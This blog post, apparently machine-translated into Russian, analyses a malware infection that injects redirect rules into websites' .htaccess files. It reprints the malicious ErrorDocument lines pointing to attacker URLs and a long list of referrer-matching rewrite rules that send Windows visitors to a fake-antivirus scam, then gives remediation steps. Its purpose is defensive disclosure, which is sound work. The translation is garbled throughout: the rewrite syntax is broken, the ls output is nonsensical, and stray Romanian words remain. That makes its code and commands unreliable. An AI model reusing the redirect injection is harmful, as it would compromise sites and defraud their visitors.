Вредоносное / Вирус - .htaccess "переписать" и перенаправление

Новая форма вируса которые видят, что не знаю, очень сильно влияет на сайты, размещенные на ненадежным серверам , где пользователи счета / субсчета могут "видеть" друг друга. В частности, хостинг-аккаунтов сделаны все в папку "виртуальные хосты"Написание и право папки пользователя "виртуальных доменов" дано общее пользователя ... реселлера в большинстве ситуаций. Это метод, который не использует типичный веб-серверов WHM / CPanel.

Действие .htaccess - .htaccess Hack

Вирус влияет файлов .htaccess жертвы сайта. Линии добавлены / Директивы к перенаправлять посетителей (Исходя из Yahoo, MSN, Google, facebook, yaindex, Twitter, MySpace, и т.д. сайтов и порталов с высокой посещаемостью) к некоторым сайтам, которые предлагают "антивирус. «Это фальшивый антивирус, О котором я писал в предисловии к .

Вот что это выглядит как .htaccess пострадавших: (Не получить доступ к линиям содержание ссылок ниже)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Яндекс. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Одноклассники. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Вконтакте. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Сосо. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Живой журнал. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Мама. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Поиск. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * [R, L]

RewriteCond% {} REQUEST_FILENAME!-Е
RewriteCond% {} REQUEST_FILENAME!-D
RewriteCond% {} * REQUEST_FILENAME Jpg $ |!. *. Gif $ | *. Png $
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * [R, L]

Те, кто использует WordPress будет найти эти строки в файле .htaccess от public_html. Кроме того, вирус создает. Htaccess файл в той же папке WP-содержание.

*Есть также ситуации, в которых вместо появляется peoriavascularsurgery.com dns.thesoulfoodcafe.com или другим адресам.

Что делает этот вирус.

После перенаправлены, посетители встречают с распростертыми объятиями сообщение:

Внимание!
Компьютер содержит различные признаки присутствия вирусов и вредоносных программ. Ваша система защиты от вирусов требует немедленной проверки!
Система безопасности будет выполнять быстрое и бесплатное сканирование компьютера на наличие вирусов и вредоносных программ.

1 вредоносных

Независимо от того, какая кнопка нажата, мы взяты на страницу "Мой компьютер"Создан, чтобы имитировать XP дизайна. Это автоматически начинается "сканирование" в конце которого мы находим, что «заразился».

2 вредоносных

После нажатия кнопки ОК или Отмена, он начнет скачатьФайлов setup.exe. Это setup.exe является поддельной антивирусной влияющие на систему. Установка некоторых вредоносного ПО распространяться дальше ссылки скомпрометированы, и к тому же эти антивирусное программное обеспечение (все ложные), что жертву предлагается купить.
Те, кто уже связался с вирусом могут использовать эту форму . Кроме того, рекомендуется сканировать весь жесткий диск. Рекомендовать Kaspersky Internet Security или Kaspersky Anti-Вирус.

Этот тип вируса поражает посетителя системы OS операционная Windows XP, Windows Мэн Windows 2000, Windows NT, Windows 98 si Windows 95. До сих пор не известны случаи заражения операционных систем Windows Прицел да Windows 7.

Как мы можем устранить этот вирус. Htaccess файл на сервер и как предотвратить инфекцию.

1. Анализ подозрительных файлов и стирание кодов. Чтобы убедиться, что файл не коснулось только .htaccess Вы должны проанализировать все файлы .php si . Js.

2. Перепишите файл. Htaccess и установите CHMOD 644 или 744 с доступом на запись только владельцем пользователя.

3. При создании учетной записи хостинга для веб-сайта в папку / Главная или / Webroot Это позволит автоматически создавать папки, которая часто имеет имя пользователя (пользователю для Cpanel, FTPИ т.д.). Для предотвращения записи данных и передача вируса от одного пользователя к другому, рекомендуется, чтобы каждый пользователь папке должен быть установлен:

CHMOD 644 или 744, 755 - показана 644.
Чаун-R nume_user nume_folder.
CHGRP-R nume_user nume_folder

LS-все способы проверки, если они были сделаны правильно. Должно появиться что-то вроде этого:

Динамика динамического динамика drwx-x-x 12 4096 Май 6 14: динамика 51 /
drwx-x-x 10 duran duran 4096 Мар 7 07: 46 duran /
drwx-x-x 12 Tube Test Tube 4096 Jan 29 11: 23 Tube /
drwxr-xr-x 14 Express 4096 Feb 26 2009 express /
drwxr-xr-x 9 ezo ezo 4096 May 19 01: 09 ezo /
drwx-x-x 9 farm 4096 farm 19 22: 29 farm /

Если одно из выше userele FTP Зараженные файлыОна не может отправить вирус другим пользователем хоста. Минимальная мера безопасности для защиты счетов размещенных на веб-сервере.

Общие элементы районах, пострадавших от этого вируса.

Все районы, пострадавшие перенаправлять посетителей на сайты по доменному имени, содержащие "/".

Этот "вирус. Htaccess"Affect любой CMS (Joomla, WordPress, PHPBBИ т.д.) с использованием .htaccess.

. Htaccess Перенаправление Вирус Hack &.

Вредоносное / Вирус - .htaccess "переписать" и перенаправление

Об авторе

Stealth LP

Основатель и главный редактор Настройки StealthВ день 2006.
Опыт работы в операционных системах Linux (особенно CentOS), Mac OS X, Windows XP> Windows 10 и WordPress (CMS).

Оставить комментарий